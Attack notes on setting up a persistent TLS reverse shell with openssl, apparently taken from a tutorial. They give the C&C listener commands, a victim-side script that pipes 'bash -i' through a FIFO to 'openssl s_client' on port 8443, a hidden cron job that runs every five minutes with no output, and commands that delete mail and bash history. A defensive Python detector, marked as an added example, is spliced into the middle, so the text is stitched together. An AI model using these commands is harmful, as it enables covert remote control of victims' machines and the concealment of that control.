The problem is that after a while the connection might be lost and the process is stuck there, so it does not get re-initialized by the cron job. This is why we start by killing it.
A shebang line is required; otherwise the script runs without a proper shell environment (job control and the usual shell setup are missing).
We tried putting the bash/openssl process into the background, but the script fails to run correctly in that situation. In any case it is best to keep that last rm, so that whenever the reverse shell fails to run (the C&C is inactive) there is no lingering, strangely named pipe file left in /tmp/ or /var/tmp/.
Warning: we cannot simply use the run-parts hourly cron jobs, because that ends up sending an email when the connection gets interrupted. Better to set up the cron job manually.
As the user:

```
cd ~/
openssl req -x509 -newkey rsa:2048 -keyout self.key -out self.crt -days 9999 -nodes
openssl s_server -quiet -key self.key -cert self.crt -port 8443 \
    -CAfile selfy.crt -Verify 0 -verify_return_error
```

Note the uppercase V in -Verify here: it forces client certificate verification, so a client that does not present a certificate that verifies against selfy.crt is rejected.
You can also set up a screenrc dotfile for that purpose:

```
screen -t "victim1" 1 $HOME/victim1
```
```
openssl req -x509 -newkey rsa:2048 -keyout selfy.key -out selfy.crt -days 9999 -nodes

CC=SERVER-ADDRESS
nmap -p 8443 $CC

/usr/bin/pkill openssl
/bin/rm -f /var/tmp/s
/bin/mkfifo /var/tmp/s
/bin/bash -i < /var/tmp/s 2>&1 \
    | /usr/bin/openssl s_client -quiet -connect $CC:8443 \
        -cert /var/tmp/selfy.crt -key /var/tmp/selfy.key \
        -CAfile /var/tmp/self.crt -verify 0 -verify_return_error \
    > /var/tmp/s 2>/dev/null
/bin/rm -f /var/tmp/s
```

Note that openssl's stderr goes to /dev/null, and that's fine.
Eventually put this in an executable watchdog script and install it in the user's crontab:

```
crontab -e -u THAT-USER
```

For testing:

```
* * * * * /path/to/somehiddenfile
```

You should be able to read the output as local mail. Once switched to production there should be no logs at all, not even a mention of the cron job:

```
*/5 * * * * /path/to/somehiddenfile >/dev/null 2>&1
```

Wait for a while and you will get the shell.
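From the defender's side, the setup described above leaves two recognisable traces: a user crontab entry that runs a program under a hidden path every few minutes with all output discarded, and a process pair in which an interactive `bash -i` and an `openssl s_client` share the same parent, with the TLS client credentials read from a world-writable temp directory. The following is an added example (not part of the original post) that scans constructed crontab text and constructed `ps -eo pid,ppid,args` output for both patterns; the sample data, the function names and the scoring thresholds are all assumptions made here for illustration.

```python
import re
from typing import Dict, List

# Constructed sample of a user crontab (one benign silent job, one watchdog-style entry).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/5 * * * * /home/alice/.cache/.watchdog >/dev/null 2>&1
30 6 * * 1 /usr/local/bin/backup.sh
"""

# Constructed sample of `ps -eo pid,ppid,args` output; 203.0.113.10 is a documentation address.
SAMPLE_PS = """\
  PID  PPID ARGS
    1     0 /sbin/init
 3851  3850 /bin/bash -i
 3852  3850 /usr/bin/openssl s_client -quiet -connect 203.0.113.10:8443 -cert /var/tmp/selfy.crt -key /var/tmp/selfy.key -CAfile /var/tmp/self.crt -verify 0 -verify_return_error
 4000     1 /usr/sbin/sshd -D
"""

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
HIDDEN_COMPONENT = re.compile(r"(?:^|/)\.[^/\s]+")       # a dot-prefixed path component
SILENT_REDIRECT = re.compile(r">\s*/dev/null\s+2>&1")     # stdout and stderr both discarded
TEMP_CREDENTIAL = re.compile(r"-(?:cert|key|CAfile)\s+(?:/tmp|/var/tmp|/dev/shm)/")
INTERACTIVE_BASH = re.compile(r"(?:^|/)bash\s+-i\b")


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split user-crontab lines into schedule and command, skipping comments and VAR= lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        entries.append({"schedule": " ".join(parts[:5]), "command": parts[5]})
    return entries


def suspicious_cron_entries(text: str) -> List[Dict[str, object]]:
    """Flag entries whose program sits in a hidden or temp path AND runs often or silently."""
    findings = []
    for entry in parse_crontab(text):
        cmd = entry["command"]
        program = cmd.split()[0]
        minute = entry["schedule"].split()[0]
        odd_location = []
        if HIDDEN_COMPONENT.search(program):
            odd_location.append("program path contains a hidden component")
        if program.startswith(TEMP_DIRS):
            odd_location.append("program lives in a world-writable temp dir")
        behaviour = []
        if SILENT_REDIRECT.search(cmd):
            behaviour.append("all output discarded (no local-mail trail)")
        if minute == "*" or (minute.startswith("*/") and int(minute[2:]) <= 5):
            behaviour.append("runs at least every 5 minutes")
        if odd_location and behaviour:
            findings.append({**entry, "reasons": odd_location + behaviour})
    return findings


def parse_ps(text: str) -> List[Dict[str, object]]:
    """Parse `ps -eo pid,ppid,args` output (header line is skipped)."""
    procs = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            procs.append({"pid": int(parts[0]), "ppid": int(parts[1]), "args": parts[2]})
    return procs


def reverse_shell_candidates(ps_text: str) -> List[Dict[str, object]]:
    """Flag openssl s_client processes paired with an interactive bash or using temp-dir credentials."""
    procs = parse_ps(ps_text)
    by_parent: Dict[int, List[Dict[str, object]]] = {}
    for p in procs:
        by_parent.setdefault(p["ppid"], []).append(p)
    findings = []
    for p in procs:
        args = str(p["args"])
        if "openssl s_client" not in args:
            continue
        reasons = []
        if TEMP_CREDENTIAL.search(args):
            reasons.append("TLS client credentials stored under a temp dir")
        siblings = by_parent.get(p["ppid"], [])
        if any(s["pid"] != p["pid"] and INTERACTIVE_BASH.search(str(s["args"])) for s in siblings):
            reasons.append("interactive bash launched from the same parent (pipeline sibling)")
        if reasons:
            findings.append({"pid": p["pid"], "args": args, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", f["schedule"], f["command"], "->", "; ".join(f["reasons"]))
    for f in reverse_shell_candidates(SAMPLE_PS):
        print("proc:", f["pid"], "->", "; ".join(f["reasons"]))
```

On a real host the same functions can be fed `crontab -l -u USER` for every local user and the live `ps -eo pid,ppid,args` output; the sibling check matters because the pipe in the watchdog script makes the shell and the TLS client children of the same parent, which is rarely the case for legitimate uses of s_client.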
```
echo lala > /dev/stdout
echo lala > /dev/stderr
```

```
cd ~/
ls -alhtrF | tail
ls -alhF mail/
rm -rf mail/ .addressbook .pine*
grep '^From ' /var/mail/root | tail -2
history -c
rm -f .bash_history
```
We would need a login shell, and the fact that the script gets executed from a cron job hinders that. The -i argument to Bash apparently does not help; we get this on the C&C side:

```
bash: cannot set terminal process group (3852): Inappropriate ioctl for device
bash: no job control in this shell
```

Eventually, pin the client certificate using a TPM.
https://medium.com/@int0x33/day-43-reverse-shell-with-openssl-1ee2574aa998